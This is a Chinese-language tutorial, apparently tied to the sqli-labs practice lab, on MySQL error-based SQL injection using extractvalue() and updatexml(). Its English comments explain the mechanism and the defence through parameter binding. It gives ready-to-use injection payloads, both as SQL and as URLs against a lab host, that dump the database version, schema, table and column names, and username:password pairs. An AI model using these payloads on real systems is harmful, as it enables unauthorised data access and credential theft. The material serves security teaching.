extractvalue(xml_frag, xpath_expr)
例如
-- NOTE(review): the XML literal appears to have lost its tags in extraction;
-- for the result 'x y' shown below, the first argument would have to be an
-- <a> element containing two <b> children holding x and y -- TODO confirm
-- against the original source.
SELECT extractvalue('xy','/a/b') as result
查询结果为
result |
---|
x y |
如果第二个参数不是合法的 XPath 表达式
-- '#username' is not valid XPath, so instead of returning a value MySQL
-- raises error 1105 and quotes the offending string back in the message
-- (see the output below).
SELECT extractvalue('xy','#username') as result
报错如下
-- SELECT * from users WHERE id = 1 and extractvalue(1,mid(concat(0x23,(SELECT GROUP_CONCAT(username,':',`password`) from users),0x23),159,32))
-- The same statement run in a client; its error output follows.
-- From a defender's view, "XPATH syntax error" text surfacing in application
-- responses or database error logs is the observable signature of the
-- technique described on this page.
SELECT extractvalue('xy','#username') as result
> 1105 - XPATH syntax error: '#username'
> 时间: 0.001s
利用此特性可以实现报错注入
由于 extractvalue 和 updatexml 的报错信息最多只能显示 32 个字符,要查看第 32 个字符之后的数据,需要借助 mid 函数按起始位置截取字符串,分段显示后面的内容
参数 | 描述 |
---|---|
column_name | 必需。要提取字符的字段 |
start | 必需。开始位置 |
length | 可选。要返回的字符数。如果省略,则 MID() 函数返回剩余文本 |
-- Error-based extraction examples. Each statement appends an extractvalue()
-- call to the `id` predicate; the leading 0x23 ('#') makes the second
-- argument invalid XPath, so MySQL echoes up to 32 characters of the
-- concatenated string inside its error message, and mid() selects which
-- 32-character window is shown.
-- Root cause on the application side: the `id` value is concatenated into
-- the WHERE clause instead of being bound as a parameter; binding it removes
-- the injection point, and not returning database errors to clients removes
-- the information channel.

-- version()/user()/database()/@@version_compile_os, joined with '#'
SELECT * from users WHERE id = 1 and
extractvalue(1,
mid(concat_ws(0x23,0x23,version(),user(),database(),@@version_compile_os,0x23),9,32))
-- schema names from information_schema
SELECT * from users WHERE id = 1 and
extractvalue(1,
mid(concat(0x23,
(SELECT group_concat(schema_name) from information_schema.SCHEMATA),
0x23),50,32))
-- table names of the current schema
SELECT * from users WHERE id = 1 and
extractvalue(1,
mid(concat(0x23,
(SELECT group_concat(table_name) from information_schema.tables where table_schema = database()),
0x23),1,32))
-- column names of the users table
SELECT * from users WHERE id = 1 and
extractvalue(1,
mid(concat(0x23,
(SELECT group_concat(COLUMN_NAME) from information_schema.`COLUMNS` where table_name = 'users'),
0x23),1,32))
-- username:password pairs from users
SELECT * from users WHERE id = 1 and
extractvalue(1,
mid(concat(0x23,
(SELECT GROUP_CONCAT(username,':',`password`) from users),
0x23),1,32))
http://192.168.1.101/Less-1/?id=1' and
extractvalue(1,
concat_ws(0x23,0x23,version(),user(),database(),@@version_compile_os)
)%23
http://192.168.1.101/Less-1/?id=1'
and extractvalue(1,
mid(concat(0x23,
(SELECT group_concat(schema_name) from information_schema.SCHEMATA),
0x23),1,32))--+
http://192.168.1.101/Less-1/?id=1'
and extractvalue(1,
mid(concat(0x23,(SELECT group_concat(table_name) from information_schema.tables where table_schema = database())
,0x23),1,32))--+
http://192.168.1.101/Less-1/?id=1' and
extractvalue(1,
mid(concat(0x23,
(SELECT group_concat(COLUMN_NAME) from information_schema.`COLUMNS` where table_name = 'users'),
0x23),1,32))--+
http://192.168.1.101/Less-1/?id=1' and
extractvalue(1,
mid(concat(0x23,
(SELECT GROUP_CONCAT(username,':',`password`) from users),
0x23),1,32))--+
updatexml(XML_document, XPath_String, new_value)
-- updatexml() variant: the invalid-XPath error is raised through its second
-- argument in the same way as with extractvalue(). `payload` is a placeholder
-- for the expression whose value is to appear in the error text; the
-- 32-character limit on that text applies here as well.
updatexml(1,concat(0x23,payload,0x23),1)